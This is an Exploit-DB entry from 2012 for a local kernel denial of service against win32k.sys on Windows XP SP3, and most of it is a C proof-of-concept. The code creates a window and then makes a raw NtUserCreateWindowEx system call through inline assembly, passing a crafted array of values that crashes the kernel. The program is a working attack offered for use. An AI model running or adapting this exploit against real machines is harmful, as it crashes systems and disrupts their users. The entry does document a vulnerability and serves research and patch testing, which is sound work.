Microsoft Windows XP - 'win32k.sys' Local Kernel Denial of Service

EDB-ID:

18819

CVE:

EDB Verified:

Author:

Lufeng Li

Type:

dos

Exploit: /

Platform:

Windows

Date:

2012-05-02

Vulnerable App:

////////////////////////////////////////////////////////////////////////////
//
// Title: Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability
// Author: Lufeng Li of Neusoft Corporation
// Vendor: www.microsoft.com
// Vulnerable: Windows xp sp3(full patch)
//
/////////////////////////////////////////////////////////////////////////////

#include <Windows.h>
#include <stdio.h>

void NtUserCreateWindowEx(HANDLE d1,int d2,int d3)
{
	_asm{
		xor eax,eax
		push eax
		push eax
	    	push eax
	    	push eax
	    	push eax
	    	push eax
	    	push eax
		push eax
		push eax
	    	push eax
	    	push eax
	    	push eax
	    	push d3
	    	push d2
		push d1
		push eax
		mov eax,0x1157
		mov edx,7FFE0300h
		call  dword ptr[edx]
		ret 0x3c
	}
}
void main()
{
	UINT i=0;
	UINT c[]={  
 0x00000000,0x28001500,0xff7c98cc,0x23ffffff
,0x167c98cc,0x007c98fb,0x02001500,0x78010000
,0x00000000,0x00001500,0x00000000,0x00001500
,0x00000000,0x00001500,0x00000000,0x00000000
,0x00000000,0x00000000,0x34000000,0x3cc00000
,0x5c0007fb,0x617c92f6,0x347c92f6,0x00c00000
,0x00000000,0x18000000,0x000007fb,0xf8000000
,0x200007fd,0x347c92e9,0x02c00000,0x4c000000
	};
		HWND _wnd = CreateWindowEx(WS_EX_TOPMOST,
								"magic",
								"magic",
								WS_POPUP,
								100,
								100,
								100,
								100,
								0,
								0,
								GetModuleHandle( 0 ),
								0);
	NtUserCreateWindowEx(_wnd,0x26,(UINT)c);
}

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services